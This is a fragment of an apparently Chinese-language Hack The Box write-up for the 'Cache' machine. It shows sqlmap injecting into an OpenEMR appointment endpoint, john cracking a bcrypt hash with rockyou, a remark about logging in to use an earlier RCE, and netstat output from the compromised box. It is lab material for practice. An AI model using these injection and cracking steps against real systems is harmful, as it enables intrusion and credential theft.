=================================================================== ID Response Lines Word Chars Payload ===================================================================
sqlmap -r sql.txt [14:33:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0
sudo john -w=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 32 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status xxxxxx (?) 1g 0:00:00:00 DONE (2020-05-24 05:13) 3.333g/s 2820p/s 2820c/s 2820C/s tristan..princesita Use the "--show" option to display all of the cracked passwords reliably Session completed
然后就可以登录openEMR,利用前面的RCE
sql.txt
1 2 3 4 5 6 7 8 9 10 11
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1 Host: hms.htb User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: OpenEMR=4ebpe344qk9vhcjgk2nesv54gv; PHPSESSID=qeiik41c06okaktjdpebot7n05 Upgrade-Insecure-Requests: 1 DNT: 1 Cache-Control: max-age=0
ash@cache:~$ netstat -tulpn netstat -tulpn (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - udp 0 0 127.0.0.53:53 0.0.0.0:*